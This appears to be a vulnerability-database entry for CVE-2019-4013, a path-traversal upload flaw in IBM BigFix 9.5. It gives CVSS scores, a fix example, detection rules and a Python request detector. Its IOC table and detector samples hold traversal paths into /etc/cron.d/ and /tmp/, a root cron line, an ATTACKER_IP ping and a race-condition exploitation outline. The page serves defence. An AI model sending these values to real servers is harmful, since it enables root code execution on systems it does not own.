CVE-2019-4013
published 2019-04-10

Priority: P2 (70) critical
CVSS 3.0: 9.9 (AV:N / AC:L / PR:L / UI:N / S:C / C:H / I:H / A:H)
Exploit: public exploit available
EPSS: 14.11% (96.1 percentile)
IBM BigFix Platform 9.5 could allow any authenticated user to upload any file to any location on the server with root privileges. This results in code execution on the underlying system with root privileges. IBM X-Force ID: 155887.
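The bug class behind that description, as an added illustration (this is not IBM BigFix code; the package directory, the function names and the use of the 'urlFileName' value as the joined name are assumptions, and only the traversal pattern comes from the advisory's IOCs): a client-supplied file name joined onto the package directory as-is, beside the containment check that stops it.

```python
"""Path-traversal in an 'upload via URL' file name: vulnerable join beside the hardened join.

Added illustration of the bug class behind CVE-2019-4013, not IBM's code. PACKAGE_DIR,
the function names and the field name are assumptions.
"""
import posixpath

PACKAGE_DIR = "/var/opt/BESServer/swd/packages"   # assumed upload root, not IBM's actual path


def vulnerable_target(url_file_name: str, base_dir: str = PACKAGE_DIR) -> str:
    """Vulnerable pattern: the client's 'urlFileName' value is joined onto the package
    directory without any check. Eight '../' components climb from a five-deep base
    directory to '/', so a server running as root writes wherever the client chose."""
    return posixpath.normpath(posixpath.join(base_dir, url_file_name))


def hardened_target(url_file_name: str, base_dir: str = PACKAGE_DIR) -> str:
    """Hardened pattern: resolve the full path first, then require it to stay under base_dir.
    Checking the resolved path (rather than grepping for '../') rejects absolute names and
    every sequence that escapes, while still allowing harmless relative components.
    Raises ValueError for a name that would land outside the package directory."""
    if not url_file_name or "\x00" in url_file_name:
        raise ValueError("empty or malformed file name")
    if posixpath.isabs(url_file_name):
        raise ValueError("absolute file names are not accepted")
    root = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(root, url_file_name))
    # Lexical containment check. On a live filesystem also compare os.path.realpath() of
    # both sides so a symlink inside the package directory cannot redirect the write.
    if candidate == root or not candidate.startswith(root + "/"):
        raise ValueError(f"{url_file_name!r} resolves outside the package directory")
    return candidate


def accepts(url_file_name: str) -> bool:
    """True if the hardened check lets the name through."""
    try:
        hardened_target(url_file_name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/cron.d/task"   # urlFileName value from the IOCs below
    print("vulnerable join writes to:", vulnerable_target(traversal))
    print("hardened join accepts it? ", accepts(traversal))
```

The containment check is only half of the fix: the advisory's severity comes from the daemon writing files as root, so the service account should also be unprivileged so that a future traversal bug cannot reach /etc/cron.d/ at all.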

Affected (2 ranges)

Vendor   Product           Version range     Fixed in
ibm      bigfix_platform   (unspecified)     (not listed)
ibm      bigfix_platform   9.5.0 – 9.5.11    (not listed)

Detection & IOCs (extracted from sources)

url       /swd/api/packages/upload
path      ../../../../../../../../etc/cron.d/task
path      ../../../../../../../../tmp/icmp.sh
command   * * * * * root bash /tmp/icmp.sh
command   ping -c 3 ATTACKER_IP
filename  cron.txt
filename  icmp.txt
  • Detect POST requests to the vulnerable upload endpoint /swd/api/packages/upload containing path traversal sequences (e.g., '../../../../') in the 'urlFileName' multipart form field.
  • Alert on the 'urlFileName' parameter value targeting sensitive OS paths such as /etc/cron.d/ or /tmp/ via directory traversal in multipart uploads to IBM BigFix.
  • Monitor for the 'fileURL' multipart field pointing to an external/attacker-controlled IP or domain in requests to /swd/api/packages/upload, indicating server-side request forgery or remote file fetch abuse.
  • Detect creation of new files under /etc/cron.d/ or execution of scripts from /tmp/ on IBM BigFix server hosts, which may indicate successful exploitation via the race-condition cron drop technique.
  • Flag authenticated sessions (user_session cookie present) issuing multipart/form-data POSTs to /swd/api/packages/upload with the 'urlDownloadAtRuntime' field set to 'false', which is the specific vulnerable upload-via-URL code path.
  • Exploitation requires an authenticated session — the attacker must already possess valid credentials for the IBM BigFix Platform web interface before the path traversal upload can be triggered.
  • The vulnerability is specific to the 'upload via URL' option in the Software Distribution (SWD) module; the direct file upload path is not affected.
  • The cron-based RCE technique relies on a race condition — the two upload requests (cron file and script file) must be sent in a loop to win the race before the temporary file is moved away.
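The request-level rules in the list above, run over constructed sample requests as an added example (not code from the page or from IBM). The multipart reader is minimal; the internal IP ranges, the `.corp.example` suffix, the host names and the sample requests are all assumptions, and 203.0.113.10 stands in for ATTACKER_IP. The fourth rule (files appearing under /etc/cron.d/ or scripts run from /tmp/) is host-side and is not covered here.

```python
"""CVE-2019-4013 detection rules applied to raw HTTP requests (added example; the
internal allowlist, host names and sample requests are constructed, not captured)."""
import ipaddress
import posixpath
import re
from urllib.parse import unquote, urlparse

UPLOAD_ENDPOINT = "/swd/api/packages/upload"
SENSITIVE_DIRS = ("/etc/cron.d/", "/tmp/")            # target directories named in the IOCs above
INTERNAL_NETS = [ipaddress.ip_network(n) for n in     # assumed: ranges a package URL may legitimately use
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIXES = (".corp.example",)                # assumed internal DNS suffix
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")  # '..' as a whole path component, either separator
BOUNDARY = "----ConstructedBoundary"


def build_request(fields, session_cookie="abc123", path=UPLOAD_ENDPOINT):
    """Assembles a raw multipart/form-data POST (constructed test input, not a capture)."""
    body = "".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                   for n, v in fields.items()) + f"--{BOUNDARY}--\r\n"
    headers = [f"POST {path} HTTP/1.1", "Host: bigfix.corp.example",
               f"Content-Type: multipart/form-data; boundary={BOUNDARY}"]
    if session_cookie:
        headers.append(f"Cookie: user_session={session_cookie}")
    return "\r\n".join(headers) + "\r\n\r\n" + body


def parse_request(raw):
    """Minimal HTTP/1.1 + multipart reader: method, path, cookies and form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (ln.partition(":") for ln in lines[1:])}
    cookies = dict(c.strip().split("=", 1) for c in headers.get("cookie", "").split(";") if "=" in c)
    fields = {}
    m = re.search(r'boundary="?([^";]+)', headers.get("content-type", ""))
    if m:
        for part in body.split("--" + m.group(1)):
            part = part.strip("\n")
            if part in ("", "--"):                     # preamble and the closing '--' marker
                continue
            phead, _, pbody = part.partition("\n\n")
            name = re.search(r'name="([^"]*)"', phead)
            if name:
                fields[name.group(1)] = pbody
    return {"method": method, "path": urlparse(path).path, "cookies": cookies, "fields": fields}


def is_external(url):
    """True when fileURL points outside the internal ranges/suffixes (third rule above)."""
    host = (urlparse(url).hostname or "").lower()
    if not host:
        return False
    try:
        return not any(ipaddress.ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:                                 # a DNS name rather than an IP literal
        return not host.endswith(INTERNAL_SUFFIXES)


def analyze_request(raw):
    """Returns the ids of the rules above that the request triggers, in rule order."""
    req = parse_request(raw)
    if req["method"] != "POST" or req["path"] != UPLOAD_ENDPOINT:
        return []
    f, hits = req["fields"], []
    name = unquote(f.get("urlFileName", ""))          # decode %2E%2E%2F-style variants before matching
    if TRAVERSAL_RE.search(name):
        hits.append("traversal-in-urlFileName")
        # Where the name lands if it climbs all the way to '/', as the 8-deep IOC values do.
        if posixpath.normpath(posixpath.join("/", name)).startswith(SENSITIVE_DIRS):
            hits.append("sensitive-target-path")
    if is_external(f.get("fileURL", "")):
        hits.append("external-fileURL")
    if f.get("urlDownloadAtRuntime", "").strip().lower() == "false" and "user_session" in req["cookies"]:
        hits.append("authenticated-upload-via-url-path")
    return hits


# Constructed samples: the first mirrors the IOCs above (203.0.113.10 stands in for ATTACKER_IP),
# the second is an ordinary package upload from an internal repository.
MALICIOUS_REQUEST = build_request({"urlFileName": "../../../../../../../../etc/cron.d/task",
                                   "fileURL": "http://203.0.113.10/cron.txt",
                                   "urlDownloadAtRuntime": "false"})
BENIGN_REQUEST = build_request({"urlFileName": "7z1900-x64.exe",
                                "fileURL": "https://repo.corp.example/7z1900-x64.exe",
                                "urlDownloadAtRuntime": "true"})

if __name__ == "__main__":
    print("malicious:", analyze_request(MALICIOUS_REQUEST))
    print("benign   :", analyze_request(BENIGN_REQUEST))
```

The traversal test runs on the percent-decoded value and checks the resolved path rather than looking for the literal string `../`, so `..%2F` variants are caught while an internal admin uploading `vendor/../pkg.exe` does not page anyone. The last rule fires on legitimate upload-via-URL traffic too; treat it as low-severity context that raises the priority of the other hits rather than as an alert on its own.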

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.0     9.9    CRITICAL  CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvd     v2.0     9.0    HIGH      AV:N/AC:L/Au:S/C:C/I:C/A:C (CVSS v2 has no Critical band; 7.0–10.0 is High)
osv     n/a      9.8    CRITICAL  (vector not given)